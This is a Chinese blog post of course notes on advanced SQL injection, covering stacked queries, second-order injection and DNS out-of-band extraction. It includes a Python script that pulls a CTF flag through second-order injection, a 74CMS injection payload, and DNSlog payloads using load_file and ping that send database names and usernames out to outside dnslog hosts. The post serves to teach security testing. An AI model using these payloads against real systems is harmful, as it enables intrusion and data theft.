小迪安全-Web攻防-SQL注入(复杂注入利用)-CTF&二次&堆叠&DNS带外

已于 2024-08-04 16:10:21 修改
阅读量705 收藏 18
点赞数 20
文章标签: 安全 前端 sql
于 2024-08-03 15:35:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43809272/article/details/140891322
版权

一、知识点

1、数据库堆叠注入

根据数据库类型决定是否支持多条语句执行

支持堆叠注入的数据库类型:MySQL,MSSQL,PostgreSQL等

堆叠的样式:

select * from news where id=1;creat table xiaodi like news;

一般而言,代码上和数据库上的堆叠操作权限是不一样的,如果代码上允许堆叠,那数据库上一定可以;如果代码上不行,数据库也可以进行堆叠

参考:https://cnblogs.com/backlion/p/9721687.html

2、数据库二次注入(重点)

应用功能逻辑涉及上导致的先写入后组合的注入

找回密码功能(典型的二次注入经常出现的地方)

1、得到你的用户名(你找回谁的密码)

       注册用户名后,登录网站,进入找回密码的验证阶段

       接收获取的用户名为注册时的用户名,修改密码(查询方式:update)

2、如果在注册用户名时,写了一个SQL注入的语句

        则当进行修改密码时,会对用户名进行调用

        即:update user set password='xiaodi' where username='SQL注入代码'

从而形成注入点

3、数据库DNSlog注入(基本用不到)

解决不回显(反向连接),SQL注入,命令执行,SSRF等

4、黑盒模式分析以上

二次注入:插入后调用显示操作符合

堆叠注入:判断注入后直接调用多条执行

DNS注入:在注入上没有太大的利用价值,其他还行

二、演示案例

1、二次注入-74CMS & [网鼎杯 2018]Unfinish

1.1 CTF-[网鼎杯 2018]Unfinish-黑盒

BUUCTF在线评测

先进入register.php页面,通过注册完账号后,进行账号登录,此时发现我们的用户名被调用了,这时就可以估计此注入点是二次注入

import requests
from bs4 import Beautifulsoup
import time
url = 'http://challenge-fela8d4934d6d577.sandbox.ctfhub.com:10800/'
m = ''
for i in range(100):
    payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i+1)
    register = {'email':'abc{}@qq.com'.format(i),'username':payload,'password':'123456'}l
    login = {'email':'abc{}@qq.com'.format(i),'password':'123456'}
    req = requests.session()
    rl = req.post(url+'register.php',data = register)
    r2 = req.post (url+'login.php', data = login)
    r3 = req.post (url+'index.php')
    html = r3.text
    soup = Beautifulsoup(html,'html.parser')
    UserName = soup.span.string.strip()
    if int(UserName) ==0:
        break
    m += chr (int (UserName))
    print (m)
    time.sleep(1)
1.2 CMS-74CMS个人会员中心-黑白盒

1)黑盒测试角度:

对学校名称进行注入

我们并没有填入学校地址,但输入了学校的名字,然后地址就会跟着学校名字一起出来,形成二次注入

xiaodi',address=user()#

即insert address value ('xiaodi',address=user()#')

2)白盒测试角度

修改简历信息,抓包发现对应函数为save_resuma_education_edit

创建简历信息过程的函数流转情况:

make1 -> make1_save -> make2 -> make2_save -> make3 -> make3_save -> make4(写入了恶意代码) -> make4_save

函数的实现过程为:

insert -> update -> select

2、堆叠注入-强网杯 2019 随便注

https://www.cnblogs.com/Timesi/p/11426348.html

3、DNS利用-平台介绍&SQL注入&命令执行等

1)平台

DNSLog Platform

http://admin.dnslog.link

http://ceye.io

2)应用场景

解决不回显,反向连接,SQL 注入,命令执行,SSRF 等

SQL注入:

MySQL中如果不支持load_file(),则就无法进行DNSlog注入。

select load_file(concat('\\\\',(select database()),'.7logee.dnslog.cn\\aa'));

and (select load_file(concat('//',(select database()),'.69knl9.dnslog.cn/abc')))

3)命令执行

ping %USERNAME%.7logee.dnslog.cn

接收主机的username

weixin_43809272
关注
  • 20
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
ctf-web网络安全课程视频.zip
10-19
1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在网络安全领域,Capture The Flag(CTF)是一种流行的竞赛形式,让参与者通过解决各种安全问题来展示和提升自己的技能。...参与CTF挑战,不断提升自己的安全防护能力,对于任何Web开发者来说都是一次宝贵的学习经历。
ctfweb攻防工具-御剑1.5.7z
04-06
3. **漏洞扫描**:御剑会检查各种常见的Web漏洞,如SQL注入、XSS跨站脚本、文件包含漏洞、命令注入等,这些都是Web应用中常见的安全风险。 4. **自动化渗透测试**:通过模拟黑客攻击行为,自动进行多种渗透测试,...
CTF题目 [成绩查询 - Bugku CTF]union注入sqlmap的入门使用,两种方法一道题
07-16
**SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵数据库进行非法操作。**Union注入**属于SQL注入的一种特殊形式,利用`UNION`操作符来合并两个或多个查询结果,以...
云原生安全检测工具(容器安全、trivy、veinmind-tools)
墨痕诉清风的博客
07-31 592
例如上文的 mysql:5.7 镜像,在扫描镜像包含的 openssl 库时,会根据操作系统版本,去 trivy.db 的"Oracle Linux 7"、“openssl”桶中查询相关漏洞信息,并最终生成 CVE-2021-23840 漏洞告警。如果没有,则需要解析基础镜像,并根据其中的操作系统版本文件(etc/alpine-release、usr/lib/os-release、/etc/os-release 等),来确定基础镜像的操作系统版本。‍‍Trivy 的漏洞库,名叫 trivy-db​​。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1707
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
读零信任网络:在不可信网络中构建安全系统07设备信任
lyingSeven的博客
08-03 403
设备安全
WEB渗透Web突破篇-SSRF
最新发布
qq_59468567的博客
08-03 491
转码服务 在线翻译 获取超链接的标题等内容进行显示 请求远程服务器资源的地方,图片加载与下载(通过URL地址加载或下载图片) 图片、文章收藏功能 对外发起网络请求的地方,网站采集、网页抓取的地方。 头像 (远程加载头像) 一切要你输入网址的地方和可以输入ip的地方。 数据库内置功能(mongodb的copyDatabase函数) 邮件系统 文件处理 在线处理工具 从URL关键字中寻找:share、wap、url、link、src、source、target、u、3g、display、sourceURl、im
前端Web-JavaScript(上)
Yu2uki的博客
07-31 1452
JavaScript(简称:JS) 是一门跨平台、面向对象的脚本语言,是用来控制网页行为的,实现人机交互效果。JavaScript 和 Java 是完全不同的语言,不论是概念还是设计。但是基础语法类似。组成:ECMAScript: 规定了JS基础语法核心知识,包括变量、数据类型、流程控制、函数、对象等。BOM:浏览器对象模型,用于操作浏览器本身,如:页面弹窗、地址栏操作、关闭窗口等。DOM:文档对象模型,用于操作HTML文档,如:改变标签内的内容、改变标签内字体样式等。
高德地图离线版 使用高德地图api的方法
m0_62336925的博客
08-02 393
然因为高德地图的瓦片地图太大,所以要让后端部署下 前端直接调用 如果本地 直接找到瓦片图路径就可以。这个代码把你想用的方法名保存到本地。这个时候会报错 因为没有这个方法。然后就可以正常使用这个方法拉。然后使用他的离线方法。找到对应的名字 复制。
探索WebKit之巅:开启现代网页应用的高效与兼容之旅
weixin_67239318的博客
08-03 219
随着现代网页应用的快速发展,WebKit作为先进的浏览器引擎,其在高效性和兼容性上的表现显得尤为重要。本文深入探讨了WebKit的架构和渲染机制,揭示了其在支持Web标准和提升浏览体验方面的关键技术。通过分析WebKit如何处理DOM操作、JavaScript执行与图形渲染等挑战,我们了解到优化WebKit性能不仅关乎算法和硬件的优化,还涉及网络协议和安全框架的理解。此外,本文讨论如何通过WebKit应对多设备和分辨率下的兼容性问题。掌握这些关键因素,对于开发者来说,是打造高效、兼容的现代网页应用的基础。
【分享】前端程序员-技术网站推荐
一位前行者的博客
07-30 914
对于前端开发人员来说,以下是一些推荐的技术网站,这些网站提供了丰富的资源和知识,可以帮助你提升前端开发技能:收集一些 、、 的网站 vite 官方中文文档 element-plus 官方中文文档 pinia 官方中文文档 vue-router 官方中文文档 Tailwind CSS 官方文档 vitest 官方中文文档 es6 中文文档 axios 官方中文文档 vxetable 官方中文文档 lodash 中文文档 echarts 官方中文文档 animat
前端面试:项目细节重难点问题分享(十四)
weixin_49062485的博客
08-02 415
更多详情:爱米的前端小笔记(csdn~xitujuejin~zhiHu~Baidu~小红shu)同步更新,等你来看!都是利用下班时间整理的,整理不易,大家多多👍💛➕🤔哦!你们的支持才是我不断更新的动力!
前端面试】五、框架
weixin_49015558的博客
07-31 531
1 Vue2 2 Vue3 3 React 4 Angular
electron 主进程和渲染进程
qq_21087199的博客
07-29 393
虽然最近一年前端大环境不好,但是大家还是要加油鸭!,努力总不会错,千军万马过独木桥,希望大家都是闯过去那一个。进入正题。
前端 axios 封装
清云
07-29 506
前端 axios 封装
我们的前端开发逆天了!1 小时搞定了新网站,还跟我说 “不要钱”
努力做最接地气的编程干货分享,感谢关注
07-29 2460
本文将带你了解一个新的 Web 框架 **Astro**,并手把手带你使用 Astro 搭建一个属于自己的站点,用过的都说真香!
前端代码混淆加密(使用Terser、WebpackObfuscator)
@Fonden
07-30 378
(注意Terser和WebpackObfuscator引入的方式不同,后者是放到plugins中)② 在 Terser 之后使用 WebpackObfuscator 进行混淆。以此在网上查找到相应工具有:Terser、WebpackObfuscator。① 使用 Terser 进行代码压缩和 source map 生成,② 设置在生产环境中才去使用混淆加密工具(开发环境会产生各种报错)为了对公司项目进行安全防护措施,前端需要进行代码混淆加密处理。压缩代码、变量和函数名混淆、删除未使用代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值